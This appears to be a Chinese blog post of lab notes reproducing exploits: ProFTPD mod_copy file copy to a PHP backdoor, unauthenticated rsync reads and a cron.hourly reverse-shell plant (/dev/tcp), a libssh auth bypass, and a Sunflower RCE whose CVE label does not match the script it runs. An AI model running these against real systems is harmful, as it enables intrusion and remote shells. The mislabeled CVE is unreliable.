Cve-2015-3306
背景:
ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。
任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdline将PHP有效负载复制到网站目录,可以实现PHP远程代码执行。
python exploit.py --host 123.58.224.8 --port 52483 --path "/var/www/html/"
123.58.224.8:52483
port从21映射到了52483
网页80端口映射到了
http://123.58.224.8:24391/backdoor.php?cmd=id
利用exp来实现任意命令执行
二.配置不当-未授权访问-Rsync 文件备份
rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配 置 ACL 或访问密码,我们将可以读写目标服务器文件。
下面是靶机的873反弹到21351端口,正常的话看默认873端口就ok
rsync rsync://123.58.224.8:21351/
读取文件:
rsync rsync://123.58.224.8:21351/src
下载文件:
rsync rsync://123.58.224.8:21351/src/etc/passwd ./
将passwd下载到当前目录
上传文件:
rsync -av passwd rsync://123.58.224.8:21351/src/tmp/passwd
将当前目录的passwd上传到目标靶机tmp目录下
rsync rsync://123.58.224.8:21351/src/tmp/passwd
读取任务计划
rsync rsync://123.58.224.8:21351/src/etc/crontab ./
创建文件
touch 1
vim 1
/bin/bash -i >& /dev/tcp/192.168.83.156/5566 0>&1chmod +x 1
rsync -av 1 rsync://123.58.224.8:21351/src/etc/cron.hourly
rsync -av 1 rsync://123.58.224.8:21351/src/etc/cron.hourly
关闭靶场
sudo docker-compose down
运行此靶场
sudo docker-compose up -d
查看启动环境
sudo docker ps
libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现
一、漏洞描述
libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。
二、漏洞影响
libssh 0.6 及更高版本具有身份验证绕过漏洞。
libssh 版本 0.8.4 和 libssh 0.7.6 已发布,以解决此问题
python3 libssh.py 192.168.83.136 2222 'whoami'
向日葵 CVE-2022-10270 远程代码执行漏洞
简介:向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。
影响版本:
向日葵个人版:windows <=11.0.0.33
向日葵简约版:<= v1.0.1.43315
连接上了但是无回显
python3 cve-2022-23131.py http://20.16.77.158 Admin
标签:攻防,rsync,libssh,协议,224.8,123.58,21351,src,cve From: https://blog.csdn.net/m0_74402888/article/details/140583522